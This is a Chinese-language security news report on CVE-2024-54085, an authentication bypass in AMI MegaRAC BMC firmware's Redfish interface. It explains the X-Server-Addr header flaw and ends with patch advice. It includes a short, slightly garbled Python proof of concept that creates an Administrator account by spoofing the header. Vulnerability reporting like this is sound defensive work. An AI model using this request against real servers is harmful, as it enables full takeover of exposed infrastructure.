安全研究人員近期發(fā)現(xiàn)，AMI的MegaRAC軟件中存在一個嚴重的漏洞，該漏洞可能被攻擊者利用以遠程繞過認證。這一漏洞編號為CVE-2024-54085，已影響眾多數(shù)據(jù)中心設(shè)備和服務(wù)器型號，可能危及全球多家組織的云基礎(chǔ)設(shè)施安全。

該漏洞存在于AMI的基板管理控制器（BMC）軟件的Redfish接口中，波及的設(shè)備包括HPE Cray XD670和Asus RS720A-E11-RS24U服務(wù)器等。根據(jù)安全分析，通過Shodan搜索，研究人員已在公共互聯(lián)網(wǎng)上發(fā)現(xiàn)了大約1000個暴露在外的實例。

Shodan上暴露的實例（來源：Eclypsium）

漏洞影響范圍

Eclypsium的研究人員指出，截至2024年8月的MegaRAC版本均受到該認證繞過漏洞的影響。調(diào)查顯示，漏洞存在于固件文件系統(tǒng)中的host-interface-support-module.lua文件中，攻擊者可通過操縱HTTP標頭值來繞過安全控制。

該漏洞的嚴重性不容小覷，當Redfish接口直接暴露在互聯(lián)網(wǎng)上時，其CVSS評分高達10.0（CVSSv3）和10.0（CVSSv4）。即使在Redfish訪問僅限于相鄰網(wǎng)絡(luò)的環(huán)境中，CVSS評分仍高達9.6（CVSSv3）和9.4（CVSSv4）。

成功利用該漏洞的攻擊者可以完全遠程控制受影響的服務(wù)器，部署惡意軟件或勒索軟件，篡改固件，甚至通過過壓條件物理損壞硬件，或制造無限重啟循環(huán)，導(dǎo)致受害者無法恢復(fù)，除非重新配置設(shè)備。

漏洞利用細節(jié)

這一漏洞的根源在于Redfish接口中的輸入驗證不充分。漏洞代碼雖然檢查了HTTP標頭值，但可以被精心設(shè)計的請求欺騙。當用戶添加X-Server-Addr標頭時，lighttpd Web服務(wù)器會將其結(jié)構(gòu)化為用戶輸入，后跟服務(wù)器的實際地址，例如：

`X-Server-Addr: , ::ffff:1.2.3.4`

漏洞代碼使用正則表達式提取第一個冒號之前的所有內(nèi)容，這意味著如果攻擊者發(fā)送“169.254.0.17:”作為輸入，系統(tǒng)將提取“169.254.0.17”，從而匹配數(shù)據(jù)庫值并繞過認證。

以下是一個簡單的漏洞利用示例：

`import requests print( json.dumps(requests.post( 'https://:8443/redfish/v1/AccountService/Accounts', jsnotallow={ 'Name': 'Hax0r', 'Password': 'password', 'UserName': 'demo712', 'RoleId': 'Administrator', }, verify=False, headers={'X-Server-Addr': '169.254.0.17:' } ).json(), indent=2) )`

修復(fù)建議

AMI已向OEM制造商發(fā)布了補丁，制造商需將這些修復(fù)措施整合到客戶更新中。建議各組織機構(gòu)確保遠程管理接口不對外暴露，并定期對所有服務(wù)器進行固件更新。